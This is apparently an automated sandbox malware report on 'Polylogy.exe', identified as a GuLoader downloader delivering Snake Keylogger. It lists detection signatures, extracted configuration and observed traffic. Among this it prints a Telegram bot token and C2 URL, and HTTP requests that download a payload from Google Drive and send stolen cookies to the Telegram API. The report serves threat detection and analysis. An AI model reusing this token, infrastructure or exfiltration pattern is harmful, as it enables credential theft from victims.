Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Polylogy.exe

Overview

General Information

Sample name:Polylogy.exe
Analysis ID:1617932
MD5:7661aaf5dbaccb77ebf948bc69b5725d
SHA1:791ccb6267488a0d86891ae25be93a36a6b5bedd
SHA256:510877d9cee23c4fc8a3f0a96b12a175f1dbe887978f43499eb1cc2d05571ffb
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Polylogy.exe (PID: 1968 cmdline: "C:\Users\user\Desktop\Polylogy.exe" MD5: 7661AAF5DBACCB77EBF948BC69B5725D)
    • Polylogy.exe (PID: 5568 cmdline: "C:\Users\user\Desktop\Polylogy.exe" MD5: 7661AAF5DBACCB77EBF948BC69B5725D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y", "Chat_id": "5898096617\n", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
    00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000000.00000002.3393295886.0000000003396000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: Polylogy.exe PID: 5568JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Polylogy.exe PID: 5568JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-18T12:37:00.660032+010028033053Unknown Traffic192.168.2.552932104.21.80.1443TCP
            2025-02-18T12:37:02.068304+010028033053Unknown Traffic192.168.2.552934104.21.80.1443TCP
            2025-02-18T12:37:08.132043+010028033053Unknown Traffic192.168.2.552942104.21.80.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-18T12:36:58.925784+010028032742Potentially Bad Traffic192.168.2.552930193.122.6.16880TCP
            2025-02-18T12:37:00.082054+010028032742Potentially Bad Traffic192.168.2.552930193.122.6.16880TCP
            2025-02-18T12:37:01.347687+010028032742Potentially Bad Traffic192.168.2.552933193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-18T12:36:53.667286+010028032702Potentially Bad Traffic192.168.2.552928142.250.185.238443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-18T12:37:18.653865+010018100081Potentially Bad Traffic192.168.2.552948149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-18T12:37:11.679661+010018100071Potentially Bad Traffic192.168.2.552947149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y", "Chat_id": "5898096617\n", "Version": "4.4"}
            Source: Polylogy.exe.5568.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y/sendMessage"}
            Source: Polylogy.exeVirustotal: Detection: 26%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D987A8 CryptUnprotectData,4_2_38D987A8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D98EF1 CryptUnprotectData,4_2_38D98EF1
            Source: Polylogy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:52931 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.5:52928 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.5:52929 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:52947 version: TLS 1.2
            Source: C:\Users\user\Desktop\Polylogy.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405731
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_004061E5 FindFirstFileW,FindClose,0_2_004061E5
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_00402706 FindFirstFileW,4_2_00402706
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405731
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_004061E5 FindFirstFileW,FindClose,4_2_004061E5
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 052DF45Dh4_2_052DF4AC
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 052DF45Dh4_2_052DF29B
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 052DFC19h4_2_052DF961
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BA2D41h4_2_38BA2A90
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BA3308h4_2_38BA2EF0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BAF329h4_2_38BAF080
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BAF781h4_2_38BAF4D8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BAEED1h4_2_38BAEC28
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_38BA0853
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_38BA0040
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BAD069h4_2_38BACDC0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BAFBD9h4_2_38BAF930
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BA3308h4_2_38BA2EED
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BADD71h4_2_38BADAC8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BA3308h4_2_38BA3236
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BAD4C1h4_2_38BAD218
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_38BA0673
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BAD919h4_2_38BAD670
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BAEA79h4_2_38BAE7D0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BA0D0Dh4_2_38BA0B30
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BA16F8h4_2_38BA0B30
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BAE1C9h4_2_38BADF20
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38BAE621h4_2_38BAE378
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D99280h4_2_38D98FB0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D97EB5h4_2_38D97B78
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D95179h4_2_38D94ED0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D97571h4_2_38D972C8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9C396h4_2_38D9C0C8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9F5C6h4_2_38D9F2F8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D90B99h4_2_38D908F0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D90741h4_2_38D90498
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D96733h4_2_38D96488
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then mov esp, ebp4_2_38D9B081
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9E386h4_2_38D9E0B8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D92151h4_2_38D91EA8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D91CF9h4_2_38D91A50
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D902E9h4_2_38D90040
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D94D21h4_2_38D94A78
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9D146h4_2_38D9CE78
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D97119h4_2_38D96E70
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9F136h4_2_38D9EE68
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D93709h4_2_38D93460
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D96CC1h4_2_38D96A18
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D932B1h4_2_38D93008
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9BF06h4_2_38D9BC38
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D962D9h4_2_38D96030
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9DEF6h4_2_38D9DC28
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D948C9h4_2_38D94620
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9ECA6h4_2_38D9E9D8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D95E81h4_2_38D95BD8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D918A1h4_2_38D915F8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9CCB6h4_2_38D9C9E8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9DA66h4_2_38D9D798
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9FA56h4_2_38D9F788
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D95A29h4_2_38D95780
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D92E59h4_2_38D92BB0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9BA76h4_2_38D9B7A8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D91449h4_2_38D911A0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D92A01h4_2_38D92758
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9C826h4_2_38D9C558
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D90FF1h4_2_38D90D48
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9E816h4_2_38D9E548
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9B5E6h4_2_38D9B318
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D9D5D6h4_2_38D9D308
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D925A9h4_2_38D92300
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D955D1h4_2_38D95328
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38D979C9h4_2_38D97720
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E06347h4_2_38E05FD8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E06970h4_2_38E06678
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0CDD8h4_2_38E0CAE0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E042B6h4_2_38E03FE8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0F8E0h4_2_38E0F5E8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E010BEh4_2_38E00DF0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E08AE8h4_2_38E087F0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E022C6h4_2_38E01FF8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0B5F0h4_2_38E0B2F8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0BAB8h4_2_38E0B7C0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E03996h4_2_38E036C8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0E5C0h4_2_38E0E2C8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0079Eh4_2_38E004D0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E077C8h4_2_38E074D0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0A2D0h4_2_38E09FD8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E01E47h4_2_38E01BA0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0A798h4_2_38E0A4A0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E03076h4_2_38E02DA8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0D2A0h4_2_38E0CFA8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0FDA8h4_2_38E0FAB0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E05986h4_2_38E056B8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E08FB0h4_2_38E08CB8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0154Eh4_2_38E01280
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E09478h4_2_38E09180
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E02756h4_2_38E02488
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0BF80h4_2_38E0BC88
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0EA88h4_2_38E0E790
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E05066h4_2_38E04D98
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E07C90h4_2_38E07998
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E00C2Eh4_2_38E00960
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E08158h4_2_38E07E60
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0AC60h4_2_38E0A968
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0D768h4_2_38E0D470
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E04746h4_2_38E04478
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0030Eh4_2_38E00040
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E06E38h4_2_38E06B40
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E05E16h4_2_38E05B48
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E09940h4_2_38E09648
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0C448h4_2_38E0C150
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E03E26h4_2_38E03B58
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0EF50h4_2_38E0EC58
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0F418h4_2_38E0F120
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E054F6h4_2_38E05228
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E08620h4_2_38E08328
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0B128h4_2_38E0AE30
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E03506h4_2_38E03238
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0DC30h4_2_38E0D938
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0E0F8h4_2_38E0DE00
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E04BD7h4_2_38E04908
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E07300h4_2_38E07008
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E019DEh4_2_38E01710
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E09E08h4_2_38E09B10
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E02BE6h4_2_38E02918
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E0C910h4_2_38E0C618
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E31FE8h4_2_38E31CF0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E31190h4_2_38E30E98
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E30338h4_2_38E30040
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E31B20h4_2_38E31828
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E30CC8h4_2_38E309D0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E31658h4_2_38E31360
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then jmp 38E30801h4_2_38E30508
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_38F94118
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_38F90BC0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_38F90B32
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_38F90C78
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_38F90F8E
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_38F940C7
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_38F940B9

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:52948 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:52947 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.5:52836 -> 162.159.36.2:53
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2018/02/2025%20/%2020:20:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y/sendDocument?chat_id=5898096617%0A&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50c1797da015Host: api.telegram.orgContent-Length: 1279
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:52933 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:52930 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:52932 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:52928 -> 142.250.185.238:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:52934 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:52942 -> 104.21.80.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg21&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
